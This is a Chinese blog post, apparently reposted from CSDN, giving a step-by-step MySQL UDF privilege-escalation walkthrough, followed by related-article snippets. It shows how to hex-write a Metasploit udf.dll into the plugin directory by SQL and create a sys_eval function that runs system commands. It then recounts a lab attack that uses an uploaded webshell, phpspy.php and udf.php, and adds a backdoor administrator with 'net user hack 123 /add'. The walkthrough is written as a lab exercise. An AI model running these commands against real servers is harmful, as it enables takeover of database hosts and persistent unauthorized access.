mysql udf tcp_MySQL UDF提权执行系统命令(示例代码)

最新推荐文章于 2023-03-16 23:53:28 发布
最新推荐文章于 2023-03-16 23:53:28 发布
阅读量78 收藏
点赞数
文章标签: mysql udf tcp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35435768/article/details/114766309
版权

UDF介绍

UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。

假设我的UDF文件名为 udf.dll,存放在MySQL安装目录的 lib/plugin 目录下。在 udf.dll 文件中,我定义了名为 sys_eval 的mysql函数,该函数可以执行系统任意命令。但是如果我现在就打开MySQL命令行,使用 select sys_eval(‘dir‘);的话,系统会返回sys_eval() 函数未定义。因为我们仅仅是把 udf.dll 放到了 lib/plugin 目录下,并没有引入。类似于面向对象编程时引入包一样,如果没有引入包,那么这个包里的类你是用不了的。

实例用法:

create function sys_eval returns string soname ‘udf.dll‘;

只有两个变量:

一个是 function_name(函数名),我们想引入的函数是 sys_eval。

还有一个变量是 shared_library_name(共享包名称),即 udf.dll 。

select * from mysql.func where name = ‘sys_eval‘; #查看创建的sys_eval函数

select sys_eval(‘whoami‘); #使用系统命令

当 MySQL< 5.2 版本时,将 .dll 文件导入到 c:windows 或者c:windowssystem32 目录下。

当 MySQL> 5.2 版本时,将 .dl l文件导入到?C:Program FilesMySQLMySQL Server?5.4libplugin 目录下。

掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限的其它账号也可以。

可以将udf.dll写入到相应目录的权限。

udf提权也是一般应用于win2000、win2003系统

UDF提权步骤

1)查看 secure_file_priv 的值

show global variables like ‘secure%‘;

当 secure_file_priv 的值为 null ,表示限制 mysqld 不允许导入|导出,此时无法提权

当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权

当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

secure_file_priv 的值在MySQL数据库的安装目录的 my.ini 文件中配置。

2)查看plugin的值

select Host,user,plugin from mysql.user where user = substring_index(user(),‘@‘,1);

当 plugin 的值为空时不可提权

当 plugin 值为 mysql_native_password时可通过账户连接提权

3)查看系统架构以及plugin目录

show variables like ‘%compile%‘; #查看主机版本及架构

show variables like ‘plugin%‘; #查看 plugin 目录

这里是x64位的系统,我们可以去kali中/usr/share/metasploit-framework/data/exploits/mysql/目录下载64位的 .dll 文件。(由于这里可能MSF更改过,所以路径有所不同)

4)将dll文件写入plugin目录,并且创建函数

创建一个表并将二进制数据插入到十六进制编码流中。你可以通过insert语句或将其分解为多个部分,然后通过update语句拼接二进制数据。

create table temp(data longblob);

insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);

update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);

select data from temp into dump file "C:\phpstudy_pro\Extensions\MySQL8.0.12\lib\plugin\udf.dll";

create function sys_eval returns string soname ‘udf.dll‘; #创建函数sys_eval

5)使用系统命令

在将 udf.dll 文件写入plugin目录后,我们就可以使用 sys_eval 函数了。

select * from mysql.func where name = ‘sys_eval‘; #查看创建的sys_eval函数

select sys_eval(‘whoami‘); #使用系统命令

drop function cmdshell; #删除函数

delete from mysql.func where name=‘cmdshell‘ #删除函数

UDF提权复现(php环境)

靶机环境:Windows Server 2003 、php 5.4.3 、 Apache2.4.23

这里我们已经通过上传一句话木马拿到网站的shell了,并且得到了网站数据库的用户名和密码都是root。但是因为获得的系统用户权限太低,无法创建新用户。而且也不能使用其他提权等手段。所以,我们现在要做的就是使用UDF进行提权。

我们把 phpspy.php 和 udf.php 两个文件上传到网站服务器

然后先访问 phpspy.php 页面,MySQL Manager——>输入数据库的密码——>选择一个数据库

由于MySQL>5.2版本后,在其安装目录的lib目录下没有 plugin 目录,所以,我们得新建这个目录,并且将我们的 udf.dll 文件放入 plugin目录下,我们执行下面命令,完成创建plugin目录,并且将udf.dll放入该目录下

select ‘xxxxxx‘ into dumpfile ‘C:\Program Files\MySQL\MySQL Server 5.4\lib\plugin::$INDEX_ALLOCATION‘

然后我们访问 udf.php 页面,并且用数据库的账户名和密码登录。

然后我们点击 Dump UDF ,提示Dump DLL Success !

然后我们点击 Create Function,下面就会有 select shell(‘cmd‘,‘whoami‘) ,然后我们点击 Mysql_query ,下面就会有whoami命令的执行结果

我们可以把命令换成 net user hack 123 /add ,新建一个用户,可以看到成功了!然后我们接下来吧hack用户添加到administrators管理员组内,就可以远程登录了!

参考链接

可是啊可是啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MYSQL提权UDF.dll
06-11
MYSQL提权 UDF.dll MYSQL提权 UDF.dll MYSQL提权 UDF.dll MYSQL提权 UDF.dll
mysql udf.dll_关于MYSQL udf.dll 提权入侵
weixin_35474374的博客
01-19 83
批处理代码:net stop mysqldel %SystemRoot%\system32\udf.dll /A/F/Qdel %SystemRoot%\udf.dll /A/F/Qdel %SystemRoot%\temp\udf.dll /A/F/Qdir %SystemRoot%\system32\com > %SystemRoot%\system32\udf.dlldir %Syst...
mysql udf.dll_mysql udf.dll提权入侵.bat文件
weixin_33168794的博客
02-27 62
net stop mysqldel %SystemRoot%system32udf.dll /A/F/Qdel %SystemRoot%udf.dll /A/F/Qdel %SystemRoot%tempudf.dll /A/F/Qdir %SystemRoot%system32com > %SystemRoot%system32udf.dlldir %SystemRoot%system32...
mysql udf 初始化_mysql数据库udf提权
weixin_26905423的博客
02-27 177
文章来源:疯猫网络mysql数据库udf提权UDF (user defined function),即用户自定义函数。通过添加新函数,对MySQL数据库的功能进行扩充,就像使用本地MySQL函数如 database() 或 version()一样。mysql数据库udf提权步骤1. 在mysql>5.1版本,udf.dll应放置在mysql安装目录的lib\plugin下。在mysql&l...
UDF提权mysql
墨鱼菜鸡
09-10 179
目录 环境 1.什么是UDF:用户自定义函数 2.前提 3.查看mysql位数 4.打开sqlmap文件夹 5.dl_文件为了防止误杀,dll_文件会经过异或编码,不能直接用,如果想用的话需要对其进行解码 6.解码 7.上传dll文件至指定文件夹(mysql安装目录下的lib/plugin/) 8.在mysql命令行导入函数 9.执行...
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
udf mysql c语言代码,欢迎大家使用
CentOS 7.5 64下编译好的lib_mysqludf_sys.so
10-12
CentOS 7.5 64位下编译好的lib_mysqludf_sys.so,源文件在https://download.csdn.net/download/shaynerain/10715798,我博客 中有介绍怎么用
lib_mysqludf_sys 的win版本dll库
12-01
lib_mysqludf_sys 的win版本dll库
Udf.dll马上下载....
07-02
Udf.dll马上下载马上下载马上下载马上下载马上下载
mysql udf.dll(UDF)漏洞修补
surpaimb的专栏
12-12 1216
下面的内容保存为一个BAT文件,下载附件,将附件里的XCACLS.vbs文件和BAT文件放在一个目录下,双击执行BAT文件。  程序代码 net stop mysql del %SystemRoot%system32udf.dll /A/F/Q del %SystemRoot%udf.dll /A/F/Q del %SystemRoot% empudf.dll /A/F/Q dir %System
mysql提权导出dll_mysql udf.dll提权入侵.bat文件
weixin_42441072的博客
02-08 74
net stop mysqldel %SystemRoot%system32udf.dll /A/F/Qdel %SystemRoot%udf.dll /A/F/Qdel %SystemRoot%tempudf.dll /A/F/Qdir %SystemRoot%system32com > %SystemRoot%system32udf.dlldir %SystemRoot%system32...
MySQLUDF
shaoyiwenet的专栏
11-21 9577
最近用到MySQLUDF, 查了一下相关文献, 对用户用户实现function和Aggregate function的方法做个介绍.
SqlMap之mysql udf.dll 提权
weixin_34324081的博客
09-01 682
先上传dll文件到任意目录,如:D:/RECYCLER/lib_mysqludf_sys.dll导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径):select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/w...
mysql udf官方文档_Mysql UDF
weixin_28951585的博客
01-19 354
1. 简介MySQLUDF(User Defined Function)类似于一种API, 用户根据一定的规范用C/C++(或采用C调用规范的语言)编写一组函数(UDF),然后编译成动态链接库,通过CREATE FUNCTION和DROP FUNCTION语句来加载和卸载UDFUDF被加载后可以像调用MySQL的内置函数一样来调用它,并且服务器在启动时会自动加载原来存在的UDF。2. 特性UD...
udf.dll源码
秋水的博客
10-03 948
mysql是一个常用的数据库系统,应用极广泛,如果得到一个mysql的用户权限,如果提升呢,下面这个思路很先进!但得有一定编程基础!   现在网上通过mysql获得系统权限大都通过MYSQL的用户函数接口UDF,比如Mix.dll和my_udf.dll。在Mix.dll中有一个MixConnect函数它会反弹shell,但是使用这个函数会造成MYSQL假死,前些天我就用这个函数反弹sh...
mysql udf.dll 下载_mysql udf.dll提权入侵.bat文件
weixin_34618526的博客
01-19 354
net stopdel %SystemRoot%system32udf.dll /A/F/Qdel %SystemRoot%udf.dll /A/F/Qdel %SystemRoot%tempudf.dll /A/F/Qdir %SystemRoot%system32com > %SystemRoot%system32udf.dlldir %SystemRoot%system32com &g...
mysql udf提权
weixin_60719780的博客
03-16 1024
udf提权只要是因为udf.dll文件,攻击者通过编写调用cmd或者shell的udf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们提权需要使用这个16进制的udf.dll文件;
mysql udf 提权
最新发布
03-06
MySQL UDF(User-Defined Function)是MySQL中的用户自定义函数,它允许用户通过编写自己的函数来扩展MySQL的功能。UDF可以用于实现各种自定义功能,包括提权提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高权限才能执行的操作,比如修改系统文件、执行系统命令等。然后将该UDF函数加载到MySQL中,并使用低权限账户调用该函数,从而实现提权操作。 需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的提权方法适用于该版本和配置。 请注意,提权是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授权的情况下进行。滥用提权功能可能导致系统被攻击或数据泄露等安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值